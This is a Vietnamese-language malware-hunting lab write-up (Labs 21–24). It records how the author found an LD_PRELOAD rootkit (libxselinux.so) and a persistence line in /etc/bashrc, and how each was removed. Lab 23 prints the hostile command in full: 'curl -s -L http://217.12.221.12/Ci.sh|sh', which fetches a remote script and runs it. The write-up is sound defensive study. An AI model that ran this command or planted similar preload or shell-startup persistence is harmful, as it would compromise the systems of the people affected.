Finding Threat (Lab 21 - 24)

Malware Analysis

Lab 21

Recon:

Khi vừa mới mở máy lên, mình đã thấy có một thông báo lỗi như này:

Thư viện libxselinux.so đã bị từ chối load vào trong LD_PRELOAD. Đây là một trong số các kĩ thuật hooking mà mình đã được học qua. Có vẻ đây chính là malware. Mình sẽ down về và kiểm tra coi sao

Tuy nhiên mình cứ mở lên hay làm gì là Kapersky ở công ty chặn bay màu :v Mình sẽ thử lấy md5 của file này và up lên VirusTotal xem sao. Nếu nó là một mã độc cũ thì khả năng sẽ có thể detect ra được

Đưa mã hash vào VirusTotal và đúng như mình nghĩ, ta có được 1 con rootkit.

Kết luận:

File mã độc: /lib64/libxselinux.so.

Mã độc được đưa vào /etc/ld.so.preload để được ưu tiên load trước.

Cách gỡ mã độc: sudo rm -rf /lib64/libxselinux.so

Lab 22

Lab lỗi không revert snapshot được

Recon:

Mình đã thử rà soát một hồi nhưng chưa thấy con mal nào cả :<

Kết luận:

Chưa tìm ra malware

Lab 23

Recon:

Với lab này, khi mới kết nối qua SSH, mình thấy có một thông báo như sau:

Thử check .bashrc, tuy nhiên có vẻ là không có gì trong này

Vậy thì mình sẽ thử check tới file etc/bashrc coi sao

Mình thấy có một đoạn lệnh curl sử dụng để down file Ci.sh về và khởi chạy sử dụng lệnh sh. Có thể đây chính là mã độc. Thử check url trên, mình thấy file này đã không còn tồn tại, giải thích cho các output mình thấy ban đầu

Kết luận:

Mã độc nằm trong file: /etc/bashrc

Đoạn mã được sử dụng: curl -s -L http://217.12.221.12/Ci.sh|sh

Cách gỡ mã độc: xóa dòng trên khỏi file /etc/bashrc

Lab 24

Lab lỗi không revert snapshot được

Recon:

Lab này mình cũng rà soát một hồi nhưng chưa thấy con mal nào hết

Kết luận:

Chưa tìm thấy malware

© 2024,Pham Quoc Trung. All rights reserved.

Last updated